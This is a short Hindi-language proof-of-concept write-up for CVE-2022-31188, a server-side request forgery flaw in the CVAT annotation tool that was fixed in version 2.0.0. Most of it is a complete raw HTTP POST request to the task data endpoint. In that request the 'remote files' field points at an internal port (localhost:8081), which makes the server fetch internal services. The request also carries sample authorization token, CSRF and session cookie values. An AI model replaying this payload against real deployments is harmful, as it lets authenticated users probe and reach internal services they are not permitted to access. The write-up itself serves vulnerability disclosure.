
CVE-2022-31188 - OpenCV CVAT (कंप्यूटर विज़न एनोटेशन टूल) SSRF
CVE-2022-31188 - OpenCV CVAT (कंप्यूटर विज़न एनोटेशन टूल) SSRF
CVAT, इंटेल द्वारा विकसित एक ओपन सोर्स कंप्यूटर विज़न एनोटेशन टूल है। "टास्क क्रिएट" प्राधिकरण वाला कोई भी उपयोगकर्ता एक दुर्भावनापूर्ण HTTP अनुरोध भेजकर SSRF भेद्यता को ट्रिगर कर सकता है और सिस्टम पर अन्य खुले पोर्ट तक पहुंच प्राप्त कर सकता है।
यह भेद्यता CVAT के 2.0.0 अपडेट के साथ ठीक कर दी गई थी।
POST /api/v1/tasks/2/data HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: application/json, text/plain, */*
Accept-Language:en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Token 06d88f739a10c7533991d8010761df721b790b7
X-CSRFTOKEN:65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGV
Content-Type: multipart/form-data; boundary=-----------------------------251652214142138553464236533436
Content-Length: 569
Origin: http://localhost:8080
Connection: close
Referer:http://localhost:8080/tasks/create
Cookie: csrftoken=65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGv; sessionid=dzks19fhlfan8fgq0j8j5toyrh49dned
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name="remote files[0]"
http://localhost:8081
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name=" image quality"
170
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name="use zip chunks"
true
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name="use cache"
true
-----------------------------251652214142138553464236533436--
लेखक: एमिर पोलाट
ट्विटर: https://twitter.com/devilsgrins